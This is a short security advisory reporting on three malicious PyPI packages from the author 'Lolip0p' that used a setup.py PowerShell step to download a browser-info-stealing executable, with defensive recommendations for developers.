Malicious 'Lolip0p' PyPi Packages Install Info-Stealing Malware

Cybersecurity companies are warning developers to be extra careful when downloading packages from the Python Package Index (PyPI) after three malicious packages were found to contain code that drops info-stealing malware on users' systems. The packages, all uploaded by the same author named 'Lolip0p' between January 7 and 12, 2023, have been removed from the PyPI, but the incident serves as a reminder of the potential dangers of downloading packages from online repositories.

What is the Threat?

A threat actor has uploaded three malicious packages to the PyPI repository, which carries code that drops info-stealing malware on developers' systems. The packages, discovered by Fortinet, were all uploaded by the same author named 'Lolip0p' between January 7 and 12, 2023. Their names are 'colorslib,' 'httpslib,' and 'libhttps.' All three have been reported and removed from the PyPI.

Why is it Noteworthy?

PyPI is the most widely used repository for Python packages that software developers use to source the building blocks of their projects. This means that a malicious package uploaded to PyPI has the potential to infect a large number of developers' systems, making it a particularly noteworthy threat.

What is the Exposure or Risk?

The malicious packages feature complete descriptions, which helps trick developers into believing they're genuine resources. This makes it more likely that a developer will download and use the package, exposing their system to the malware.

The packages feature the same malicious 'setup.py' file that attempts to run PowerShell that fetches an executable from a suspicious URL, named 'Oxyz.exe.' This piece of malware steals browser information. The detection rates for all three executables used in this attack are quite low, ranging between 4.5% and 13.5%, allowing the malicious files to evade detection from multiple security agents that may be running on the victim host.

What are the Recommendations?

To ensure the safety and security of their projects, software developers should pay attention selecting and downloading packages from PyPI and other online repositories. They should also be wary of downloading packages from unknown authors, and should check the package's description and other information before downloading.

Developers should also consider using a reputable security solution that can scan packages for malware before they are downloaded and used. Additionally, developers should also ensure that their systems are kept up to date with the latest security patches to minimize the risk of infection.